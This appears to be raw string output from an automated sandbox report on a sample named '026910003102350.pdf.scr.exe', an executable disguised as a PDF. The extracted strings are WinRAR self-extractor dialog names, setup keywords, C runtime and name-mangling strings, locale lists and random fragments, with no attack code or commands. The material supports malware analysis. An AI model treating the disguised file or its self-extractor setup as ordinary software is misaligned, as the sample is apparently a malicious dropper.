Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ppngriched20.dlls:ids_browsetitles:ids_cmdextractings:ids_skippings:ids_unexpeofs:ids_fileheaderbrokens:ids_headerbrokens:ids_mainheaderbrokens:ids_cmtheaderbrokens:ids_cmtbrokens:ids_outofmemoryerrors:ids_unknownmethods:ids_cannotopens:ids_cannotcreates:ids_cannotmkdirs:ids_encrcrcfaileds:ids_extrcrcfaileds:ids_packeddatacrcfaileds:ids_writeerrors:ids_readerrors:ids_closeerrors:ids_cannotfindvols:ids_badarchives:ids_extractings:ids_asknextvoltitles:ids_archeaderbrokens:ids_dones:ids_errors:ids_errorss:ids_bytess:ids_modifiedons:ids_badfolders:ids_createerrorss:ids_restarthints:ids_crcerrorss:ids_allfiless:ids_title1s:ids_title1as:ids_title2s:ids_title3s:ids_title4s:ids_title5s:ids_title6s:ids_arcbrokens:ids_extrfilestos:ids_extrfilestotemps:ids_extractbuttons:ids_extractprogresss:ids_maxpathlimits:ids_unkencmethods:ids_wrongpasswords:ids_wrongfilepasswords:ids_copyerrors:ids_cannotcreatelnkss:ids_cannotcreatelnkhs:ids_errlnktargets:ids_needadmins:ids_pauses:ids_continues:ids_secwarnings:ids_secdeldll$startdlg:size$startdlg:caption$startdlg:idc_destedittitle$startdlg:idc_changedir$startdlg:idc_progressbartitle$startdlg:idok$startdlg:idcancel$replacefiledlg:size$replacefiledlg:caption$replacefiledlg:idc_owrfileexists$replacefiledlg:idc_owraskreplace$replacefiledlg:idc_owrquestion$replacefiledlg:idc_owryes$replacefiledlg:idc_owrall$replacefiledlg:idc_owrrename$replacefiledlg:idc_owrno$replacefiledlg:idc_owrnoall$replacefiledlg:idc_owrcancel$renamedlg:size$renamedlg:caption$renamedlg:idok$renamedlg:idcancel$renamedlg:idc_renamefrom$renamedlg:idc_renameto$getpassword1:size$getpassword1:caption$getpassword1:idc_passwordenter$getpassword1:idok$getpassword1:idcancel$licensedlg:size$licensedlg:caption$licensedlg:idok$licensedlg:idcancel$asknextvol:size$asknextvol:caption$asknextvol:idc_nextvolinfo1$asknextvol:idc_nextvolfind$asknextvol:idc_nextvolinfo2$asknextvol:idok$asknextvol:idcancelrarsfxstaticreplacefiledlgrenamedlg%s %s %s%s %sgetpassword1%sxasknextvolwinrarsfxmappingfile.tmpsfxname%4d-%02d-%02d-%02d-%02d-%02d-%03dsfxstimestartdlgsfxcmdsfxparlicensedlg __tmp_rar_sfx_access_check_%u-el -s2 "-d%s" "-sp%s"runas"%s"
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: %sdeletetexttitlepathsilentoverwritesetuptempmodelicensepresetupshortcutsavepathupdatesetupcode%s.%d.tmpsoftware\microsoft\windows\currentversionprogramfilesdir\hidemaxmin%s%s%u.lnk.infinstallsoftware\winrar sfxuser32.dllgdi32.dllcomdlg32.dlladvapi32.dllshell32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ole32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: fole32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: acquiresrwlockexclusive
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: releasesrwlockexclusive
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: shlwapi.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: comctl32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: kernel32.dllacquiresrwlockexclusivereleasesrwlockexclusiveshlwapi.dllcomctl32.dll
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bad array new length
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bad array new length@
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: <5ikq
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: bad exception
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __based(
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __cdecl
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __pascal
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __stdcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __thiscall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __fastcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __vectorcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __clrcall
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __eabi
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __swift_1
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __swift_2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __swift_3
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __ptr64
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __restrict
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __unaligned
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: restrict(
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: delete
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: operator
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vftable'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vbtable'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vcall'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `typeof'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `local static guard'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `string'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vbase destructor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector deleting destructor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `default constructor closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `scalar deleting destructor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector destructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector vbase constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `virtual displacement map'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `eh vector constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `eh vector destructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `eh vector vbase constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `copy constructor closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `udt returning'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `rtti
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `local vftable'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `local vftable constructor closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: new[]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: delete[]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `omni callsig'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `placement delete closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `placement delete[] closure'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `managed vector constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `managed vector destructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `eh vector copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `eh vector vbase copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `dynamic initializer for '
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `dynamic atexit destructor for '
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `vector vbase copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `managed vector copy constructor iterator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `local static thread guard'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: operator ""
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: operator co_await
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: operator<=>
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: type descriptor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: base class descriptor at (
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: base class array'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: class hierarchy descriptor'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: complete object locator'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `anonymous namespace'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: __based(__cdecl__pascal__stdcall__thiscall__fastcall__vectorcall__clrcall__eabi__swift_1__swift_2__swift_3__ptr64__restrict__unalignedrestrict( new delete=>><<!==!=[]operator->++---+&->/%<<=>>=,()~^\|&&\|\|*=+=-=/=%=>>=<<=&=\|=^=`vftable'`vbtable'`vcall'`typeof'`local static guard'`string'`vbase destructor'`vector deleting destructor'`default constructor closure'`scalar deleting destructor'`vector constructor iterator'`vector destructor iterator'`vector vbase constructor iterator'`virtual displacement map'`eh vector constructor iterator'`eh vector destructor iterator'`eh vector vbase constructor iterator'`copy constructor closure'`udt returning'`eh`rtti`local vftable'`local vftable constructor closure' new[] delete[]`omni callsig'`placement delete closure'`placement delete[] closure'`managed vector constructor iterator'`managed vector destructor iterator'`eh vector copy constructor iterator'`eh vector vbase copy constructor iterator'`dynamic initializer for '`dynamic atexit destructor for '`vector copy constructor iterator'`vector vbase copy constructor iterator'`managed vector copy constructor iterator'`local static thread guard'operator "" operator co_awaitoperator<=> type descriptor' base class descriptor at ( base class array' class hierarchy descriptor' complete object locator'`anonymous namespace'
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: <pi-ms-win-core-fibers-l1-1-1<pi-ms-win-core-synch-l1-2-0api-ms-
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: flsalloc
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: flsfree
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: flsgetvalue
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: flssetvalue
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: initializecriticalsectionex
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ( 8px
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 50p( 8px
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 700wp
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `h````
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: xpxxxx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: `h````xpxxxx
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: (null)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: (null)(null)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: corexitprocess
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mscoree.dllcorexitprocess`
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nan(snan)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nan(snan)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nan(ind)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: nan(ind)
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: e+000
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: sunday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: monday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: tuesday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: wednesday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: thursday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: friday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: saturday
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: january
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: february
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: march
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: april
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: august
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: september
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: october
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: november
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: december
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: mm/dd/yy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: dddd, mmmm dd, yyyy
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: hh:mm:ss
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: infinfnannannan(snan)nan(snan)nan(ind)nan(ind)e+000sunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:sssunmontuewedthufrisatsundaymondaytuesdaywednesdaythursdayfridaysaturdayjanfebmaraprmayjunjulaugsepoctnovdecjanuaryfebruarymarchapriljunejulyaugustseptemberoctobernovemberdecemberampmmm/dd/yydddd, mmmm dd, yyyyhh:mm:ssen-us g
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ((((( h
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: (
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: !"#$%&'()*+,-./0123456789:;<=>?@abcdefghijklmnopqrstuvwxyz[\]^_`abcdefghijklmnopqrstuvwxyz{\|}~
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: api-ms-win-appmodel-runtime-l1-1-1<pi-ms-win-core-datetime-l1-1-1<pi-ms-win-core-fibers-l1-1-1<pi-ms-win-core-file-l2-1-1<pi-ms-win-core-localization-l1-2-1<pi-ms-win-core-localization-obsolete-l1-2-0<pi-ms-win-core-processthreads-l1-1-2<pi-ms-win-core-string-l1-1-0<pi-ms-win-core-synch-l1-2-0<pi-ms-win-core-sysinfo-l1-2-1<pi-ms-win-core-winrt-l1-1-0<pi-ms-win-core-xstate-l2-1-0api-ms-win-rtcore-ntuser-window-l1-1-0api-ms-win-security-systemfunctions-l1-1-0ext-ms-win-kernel32-package-current-l1-1-0ext-ms-win-ntuser-dialogbox-l1-1-0ext-ms-win-ntuser-windowstation-l1-1-0advapi32kernel32user32
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: getcurrentpackageid
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: lcmapstringex
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: localenametolcid
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ja-jpzh-cnko-krzh-twuk
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: k#cd8l2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: [aoni*{
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: elk(w
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ~ $s%r
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: @b;zo]
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: iu+-,
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: obwq4
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: v2!l.2
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ^<v7w
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 1#inf
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 1#qnan
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 1#snan
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: 1#ind
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: ;01#inf1#qnan1#snan1#ind
Source: 026910003102350.pdf.scr.exe, 00000000.00000002.340381369.0000000000CF3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: arbgcazh-chscsdadeelenesfifrhehuisitjakonlnoplptroruhrsksqsvthtruridbesletlvltfavihyazeumkafkafohimskkkyswuzttpagutateknmrsamnglkoksyrdivar-sabg-bgca-escs-czda-dkde-deel-grfi-fifr-frhe-ilhu-huis-isit-itnl-nlnb-nopl-plpt-brro-roru-ruhr-hrsk-sksq-alsv-seth-thtr-trur-pkid-iduk-uabe-bysl-siet-eelv-lvlt-ltfa-irvi-vnhy-amaz-az-latneu-esmk-mktn-zaxh-zazu-zaaf-zaka-gefo-fohi-inmt-mtse-noms-mykk-kzky-kgsw-keuz-uz-latntt-rubn-inpa-ingu-inta-inte-inkn-inml-inmr-insa-inmn-mncy-gbgl-eskok-insyr-sydiv-mvquz-bons-zami-nzar-iqde-chen-gbes-mxfr-beit-chnl-benn-nopt-ptsr-sp-latnsv-fiaz-az-cyrlse-sems-bnuz-uz-cyrlquz-ecar-egzh-hkde-aten-aues-esfr-casr-sp-cyrlse-fiquz-pear-lyzh-sgde-luen-caes-gtfr-chhr-basmj-noar-dzzh-mode-lien-nzes-crfr-lubs-ba-latnsmj-sear-maen-iees-pafr-mcsr-ba-latnsma-noar-tnen-zaes-dosr-ba-cyrlsma-sear-omen-jmes-vesms-fiar-yeen-cbes-cosmn-fiar-syen-bzes-pear-joen-ttes-arar-lben-zwes-ecar-kwen-phes-clar-aees-uyar-bhes-pyar-qaes-boes-sves-hnes-nies-przh-chtsrx
